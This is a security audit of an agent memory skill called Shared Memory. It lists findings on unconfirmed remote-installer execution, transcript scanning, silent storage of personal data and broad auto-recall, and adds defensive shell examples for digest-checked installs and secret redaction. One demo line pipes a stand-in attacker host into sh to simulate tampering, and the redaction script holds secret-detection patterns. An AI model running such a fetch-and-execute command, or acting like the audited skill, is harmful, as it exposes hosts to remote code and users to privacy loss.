
Security audit

Shared Memory

Security checks across malware telemetry and agentic risk

Overview

This is a real local memory skill, but it gives the agent broad authority to install code, read session transcripts, and silently store personal facts with insufficient user control.

Review this carefully before installing. Only install if you are comfortable with a memory system that can run a remote installer, read local agent session logs, store personal facts durably, and inject retrieved memories into future prompts sent to your configured LLM. Prefer manual CLI installation, disable or limit auto-recall if available, avoid storing secrets or sensitive personal data, and periodically review/delete memory rows in the local browser.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Rogue Agent: Self-Modification, Session Persistence
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
Findings (15)

Description-Behavior Mismatch

Medium
Confidence
95% confidence
Finding
The skill is presented as a memory wrapper, but it instructs the agent to automatically fetch and execute a remote installer via `curl | bash`-style process substitution without prior user confirmation. That expands the trust boundary from local CLI usage to arbitrary network-retrieved code execution, creating a supply-chain and remote code execution risk if the URL, repository, or transport is compromised.

Context-Inappropriate Capability

High
Confidence
97% confidence
Finding
The skill embeds software installation and update behavior unrelated to the narrow task of memory management, including executing a remote installer and later downloading release artifacts. Even if hashes are checked, instructing an agent to self-bootstrap tooling from the network increases attack surface and can be abused for supply-chain compromise or unauthorized code execution on the host.
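The two findings above turn on the difference between piping network bytes into a shell and fetching an artifact to disk, checking it against a digest pinned in the skill itself, and only then executing it. The script below is an added illustration of that fetch-verify-execute pattern; it is not ling-mem's installer, and the release URL layout and the pinned digest are assumptions. The offline demo constructs a throwaway installer file, accepts it under its pinned digest, then appends one line to simulate tampering and shows the run being refused.

```sh
#!/bin/sh
# Added example (not ling-mem's own installer): download, pin, verify, then run.
# The release URL layout and the pinned digest are placeholders, not real values.

# SHA-256 of a file; works with GNU coreutils (sha256sum) or BSD/macOS (shasum).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Fetch to a file instead of `bash <(curl ...)`: HTTPS only, TLS 1.2+,
# fail on HTTP errors. The version is pinned in the URL (assumed layout).
fetch_installer() {
  url="$1"; out="$2"
  curl --proto '=https' --tlsv1.2 -fsSL "$url" -o "$out"
}

# Run the script only if its SHA-256 equals the digest pinned in the skill/config.
# A mismatch returns 1 and nothing is executed.
verify_and_run() {
  script="$1"; expected="$2"
  actual=$(sha256_of "$script")
  if [ "$actual" != "$expected" ]; then
    echo "refusing to run $script: digest $actual != pinned $expected" >&2
    return 1
  fi
  sh "$script"
}

# Offline demonstration with a constructed installer file. Returns 0 only if the
# pinned digest is accepted AND the tampered copy is refused.
demo() {
  tmp=$(mktemp)
  printf 'echo "installer ran"\n' > "$tmp"
  pinned=$(sha256_of "$tmp")          # in practice copied from the release notes
  verify_and_run "$tmp" "$pinned" >/dev/null || { rm -f "$tmp"; return 1; }
  printf 'curl -s http://attacker.invalid | sh\n' >> "$tmp"   # simulated tamper
  if verify_and_run "$tmp" "$pinned" 2>/dev/null; then rm -f "$tmp"; return 1; fi
  rm -f "$tmp"
  return 0
}

demo
```

The point for the agent-instruction case is that the digest lives in the skill (reviewed at install time), not in a file fetched alongside the script from the same origin; an attacker who controls the download host can replace both otherwise.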

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The script intentionally extracts and emits `[SESSION_CWD]` from session logs, which can reveal sensitive local path information such as usernames, repository names, client names, or internal project structure. In a durable-memory skill whose stated purpose is to retain facts about the user rather than operational session metadata, this expands collection scope and creates unnecessary privacy leakage that could be persisted or re-used later.

Vague Triggers

Medium
Confidence
87% confidence
Finding
The README explicitly states that a UserPromptSubmit hook performs semantic search and injects stored memories on every prompt, with no described scoping, consent gate, or contextual restrictions. In a cross-host memory system, this can cause unnecessary disclosure of sensitive stored facts into unrelated prompts or to third-party LLM backends, making the broad automatic trigger a genuine privacy and prompt-scope vulnerability.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The README acknowledges that retrieved facts enter the agent's prompt context and reach the configured LLM, but it does not present this as a prominent privacy warning near the auto-recall feature or quick-start flow. Because this skill is designed to store durable user facts and automatically surface them, insufficient warning materially increases the risk of users unknowingly exposing personal, behavioral, or organizational data.

Vague Triggers

Medium
Confidence
88% confidence
Finding
The skill's broad default activation means almost any user message other than a `/shared-memory dream` invocation can trigger memory behavior, increasing the chance of unintended searches, writes, or data processing without clear invocation boundaries. In a persistent-memory skill handling personal data, ambiguous triggering raises privacy and consent risks and makes prompt-injection or accidental activation more likely.

Missing User Warnings

High
Confidence
98% confidence
Finding
The instructions explicitly tell the agent to run installation commands itself and not ask the user before downloading and executing code from the network. Autonomous shell execution of remote code is highly dangerous because it bypasses user review and can directly compromise the local system if the script source or dependency chain is malicious or tampered with.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The skill directs silent auto-saving of sensitive personal information such as relationships, location, timezone, identity, and preferences into durable memory without confirmation. This weakens informed consent, increases privacy risk, and can cause persistent retention of data the user did not realize would be stored across sessions and hosts.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The design explicitly authorizes scanning host session transcript files from Claude Code, Codex, and OpenClaw, which can contain highly sensitive prompts, outputs, credentials, proprietary code, and personal data. Although the document mentions secret filtering, it provides no clear user-facing consent, warning, or visibility mechanism for this privacy-sensitive log access, creating a real risk of unexpected collection and persistence of sensitive session content.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The optional SessionStart recall hook performs automatic background retrieval and injects memory into the session without requiring an explicit user action at recall time. Even if token-budgeted, this can surface sensitive historical data unexpectedly into new contexts, increasing privacy leakage and the chance that stale or confidential memory is exposed to the model or copied into outputs.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The skill instructs the agent to scan historic host transcripts and persist derived memory/state without requiring an explicit user-facing privacy notice or confirmation at execution time. Because transcripts can contain sensitive personal or contextual information even after filtering, silently ingesting and retaining them increases the risk of over-collection, unexpected retention, and privacy harm.
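The `[SESSION_CWD]` path leakage, the "secret filtering" the document mentions for transcript scanning, and the silent persistence flagged just above all come down to what a pre-ingest filter actually removes before a row is written. The script below is an added illustration, not ling-mem's filter: it redacts a few well-known secret shapes and home-directory prefixes line by line, and drops any line that still looks sensitive after redaction (a private-key block spans lines, so a per-line regex cannot safely redact it). The regexes and the sample transcript are constructed for the example; a real filter needs a maintained ruleset and an allow-list for false positives.

```sh
#!/bin/sh
# Added example (not ling-mem's own filter): redact obvious secrets and
# home-directory paths from transcript lines before anything is persisted.
# Patterns and sample data are illustrative, not a complete ruleset.

# Reads lines on stdin, writes redacted lines on stdout.
redact_stream() {
  sed -E \
    -e 's#AKIA[0-9A-Z]{16}#[REDACTED_AWS_KEY]#g' \
    -e 's#(Bearer )[A-Za-z0-9._~+/=-]+#\1[REDACTED_TOKEN]#g' \
    -e 's#sk-[A-Za-z0-9_-]{20,}#[REDACTED_API_KEY]#g' \
    -e 's#(/home|/Users)/[^/[:space:]]+#~#g'
}

redact_line() {
  printf '%s\n' "$1" | redact_stream
}

# Returns 0 if a line still matches a secret-looking pattern after redaction,
# so the caller drops it instead of persisting it.
still_sensitive() {
  printf '%s\n' "$1" | grep -Eq \
    -e 'AKIA[0-9A-Z]{16}|sk-[A-Za-z0-9_-]{20,}|-----BEGIN [A-Z ]*PRIVATE KEY-----'
}

# Redact, then gate: only lines that pass both steps reach stdout.
filter_transcript() {
  while IFS= read -r line; do
    clean=$(redact_line "$line")
    if still_sensitive "$clean"; then
      echo "dropped line containing unredactable secret" >&2
      continue
    fi
    printf '%s\n' "$clean"
  done
}

# Constructed sample transcript (not real session data).
sample_transcript() {
  cat <<'EOF'
[SESSION_CWD] /home/alice/clients/acme/api
user: deploy with AWS key AKIAABCDEFGHIJKLMNOP
tool: Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.abc-def_ghi
tool: -----BEGIN OPENSSH PRIVATE KEY-----
assistant: set OPENAI_API_KEY=sk-abcdefghijklmnopqrstuvwxyz
EOF
}

sample_transcript | filter_transcript
```

Note that the cwd line survives with the username stripped but the client and project names intact; whether that is acceptable is exactly the scoping decision the finding on `[SESSION_CWD]` says the skill never surfaces to the user.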

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The workflow performs destructive deletion of episodic rows via eviction and delete commands, but the instructions do not require a clear warning to the user that data may be permanently removed. This creates a real integrity and availability risk for stored memory because an agent following the skill can erase records during cleanup with no explicit acknowledgment from the user.

Ssd 3

Medium
Confidence
96% confidence
Finding
The skill encourages broad collection and durable retention of personal information, including relationship data, location, timezone, identity, and goals, with cross-host persistence and minimal confirmation. In context, this is more dangerous because the skill is specifically designed to centralize long-lived user biography across environments, magnifying privacy harm from overcollection, misclassification, or compromise of the backing store.

Self-Modification

High
Category
Rogue Agent
Content
- **Typed facts.** `fact`, `preference`, `decision`, `learned`, plus trajectory-level `tried`, `fixed`, `built`. Searches and filters operate on these tags.
- **Forgetting is first-class.** Delete by id, forget by filter — refuses empty filters as a guardrail.
- **Local-first storage.** The memory store is on disk in `~/.linggen/memory/` (LanceDB) — no cloud sync, no telemetry. Retrieved facts do enter your agent's prompt context on each turn, so they reach whichever LLM you've configured.
- **Self-updating.** `ling-mem upgrade --check` reports the latest release; `--yes` swaps the binary atomically. (`self-update` still works as an alias.)

## Quick start
Confidence
78% confidence
Finding
self-update

Session Persistence

Medium
Category
Rogue Agent
Content
# Extractor prompt — host-LLM judge + write

This file is the host LLM's working prompt for **Phase 2** of
`/shared-memory dream`. The `scan` action already produced a clean,
Confidence
87% confidence
Finding
write This file is the host LLM's working prompt for **Phase 2** of `/shared-memory dream`. The `scan` action already produced a clean, secret-filtered, byte-capped transcript per session and wrote t

VirusTotal

VirusTotal engine telemetry is currently stale for this artifact.
